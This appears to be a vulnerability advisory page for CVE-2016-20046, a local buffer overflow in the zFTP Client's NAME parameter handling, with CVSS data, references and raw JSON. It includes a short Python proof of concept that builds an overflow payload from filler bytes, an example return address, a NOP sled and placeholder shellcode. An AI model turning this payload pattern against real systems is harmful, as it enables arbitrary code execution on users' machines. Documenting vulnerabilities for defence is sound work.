Security Vulnerability Report
CVE-2016-20046 CVSS 8.4 HIGH

CVE-2016-20046

Published: 2026-03-28 12:16:01
Last Modified: 2026-05-01 15:21:32

Description

zFTP Client 20061220+dfsg3-4.1 contains a buffer overflow vulnerability in the NAME parameter handling of FTP connections that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized NAME value exceeding the 80-byte buffer allocated in strcpy_chk to overwrite the instruction pointer and execute shellcode with user privileges.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

zFTP Client 20061220+dfsg3-4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2016-20046: zFTP Client Buffer Overflow
# This script generates a malicious string to trigger the overflow.


def generate_payload():
    # Buffer size is 80 bytes. We need to overflow and overwrite EIP.
    # Fill the buffer (80 bytes)
    buffer = b'A' * 80

    # Overwrite EIP (4 bytes on x86) - Example address
    eip = b'\xbb\x11\x11\x11'

    # NOP sled + placeholder shellcode
    nop_sled = b'\x90' * 32
    shellcode = b'\xcc' * 50  # Int3 for testing crash

    payload = buffer + eip + nop_sled + shellcode
    return payload


if __name__ == "__main__":
    print("[+] Generating malicious payload for CVE-2016-20046...")
    payload = generate_payload()
    print(f"[+] Payload length: {len(payload)} bytes")
    print("[+] Payload (hex):", payload.hex())
    # Usage: Feed this payload into the NAME parameter of a FTP connection
    # handled by the vulnerable zFTP Client.
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20046", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:00.827", "lastModified": "2026-05-01T15:21:32.393", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "zFTP Client 20061220+dfsg3-4.1 contains a buffer overflow vulnerability in the NAME parameter handling of FTP connections that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized NAME value exceeding the 80-byte buffer allocated in strcpy_chk to overwrite the instruction pointer and execute shellcode with user privileges."}, {"lang": "es", "value": "zFTP Cliente 20061220+dfsg3-4.1 contiene una vulnerabilidad de desbordamiento de búfer en el manejo del parámetro NAME de las conexiones FTP que permite a atacantes locales bloquear la aplicación o ejecutar código arbitrario. Los atacantes pueden proporcionar un valor NAME sobredimensionado que excede el búfer de 80 bytes asignado en strcpy_chk para sobrescribir el puntero de instrucción y ejecutar shellcode con privilegios de usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://cernlib.web.cern.ch/cernlib/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40203", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zftp-client-20061220-dfsg3-local-buffer-overflow", "source": "[email protected]"}]}}